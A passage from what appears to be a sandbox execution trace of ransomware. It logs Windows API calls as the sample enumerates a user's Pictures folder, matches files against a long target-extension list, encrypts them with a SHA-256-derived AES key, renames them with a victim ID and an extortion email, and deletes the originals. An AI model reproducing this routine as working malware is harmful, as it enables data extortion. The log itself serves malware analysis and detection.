zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0197.392] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.393] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.393] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0197.395] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x18ed6, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x18ed6, lpOverlapped=0x0) returned 1
	[0197.400] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.400] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcb5d8) returned 1
	[0197.403] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.403] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0197.403] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.403] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0197.404] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.404] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb8ef0) returned 1
	[0197.404] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.404] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x18ed6, dwBufLen=0x18ed6 | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x18ee0) returned 1
	[0197.407] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.408] RtlMoveMemory (in: Destination=0xff6060, Source=0xfdd180, Length=0x18ed6 | out: Destination=0xff6060) 
	[0197.408] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.408] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff6060*, pdwDataLen=0x18aefc*=0x18ed6, dwBufLen=0x18ee0 | out: pbData=0xff6060*, pdwDataLen=0x18aefc*=0x18ee0) returned 1
	[0197.409] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.409] CryptDestroyKey (hKey=0xfb8ef0) returned 1
	[0197.409] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.409] CryptDestroyHash (hHash=0xfb9b30) returned 1
	[0197.409] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.410] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0197.410] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.410] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0197.411] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.411] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0197.412] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 103
	[0197.413] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0197.414] WriteFile (in: hFile=0x388, lpBuffer=0xff6060*, nNumberOfBytesToWrite=0x18ee0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xff6060*, lpNumberOfBytesWritten=0x18b358*=0x18ee0, lpOverlapped=0x0) returned 1
	[0197.423] CloseHandle (hObject=0x388) returned 1
	[0197.424] CloseHandle (hObject=0x2c0) returned 1
	[0197.424] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg")) returned 1
	[0197.498] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k6x1lbrqivx -.jpg")) returned 0
	[0197.498] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5684560, ftCreationTime.dwHighDateTime=0x1d969c3, ftLastAccessTime.dwLowDateTime=0x54c41e80, ftLastAccessTime.dwHighDateTime=0x1d96aee, ftLastWriteTime.dwLowDateTime=0x54c41e80, ftLastWriteTime.dwHighDateTime=0x1d96aee, nFileSizeHigh=0x0, nFileSizeLow=0x250f, dwReserved0=0x0, dwReserved1=0x0, cFileName="K959WnyK.bmp", cAlternateFileName="")) returned 1
	[0197.498] lstrcmpW (lpString1="K959WnyK.bmp", lpString2="..") returned 1
	[0197.498] lstrcmpW (lpString1="K959WnyK.bmp", lpString2=".") returned 1
	[0197.498] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\"
	[0197.499] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\", lpString2="K959WnyK.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\K959WnyK.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\K959WnyK.bmp"
	[0197.499] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\K959WnyK.bmp") returned 56
	[0197.499] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0197.499] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\5KqhPE_Jl-uI\\K959WnyK.bmp", cchLength=0x38 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp") returned 0x38
	[0197.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.500] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp", lpSrch="help_decrypt_your_files") returned 0x0
	[0197.500] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp") returned="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp"
	[0197.500] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp") returned 56
	[0197.500] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0197.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.500] StrStrW (lpFirst=".bmp", lpSrch=".") returned=".bmp"
	[0197.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0197.501] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".bmp") returned=".bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0197.501] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0197.501] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0197.502] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\5kqhpe_jl-ui\\k959wnyk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0197.502] ReadFile (in: hFile=0x2c0, lpBuffer=0xfda128, nNumberOfBytesToRead=0x250f, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfda128*, lpNumberOfBytesRead=0x18b350*=0x250f, lpOverlapped=0x0) returned 1
	[0197.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.505] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcba18) returned 1
	[0197.508] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.508] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0197.508] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.508] CryptHashData (hHash=0xfb9b30, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0197.508] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0197.508] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9b30, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb91f0) returned 1
	[0197.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
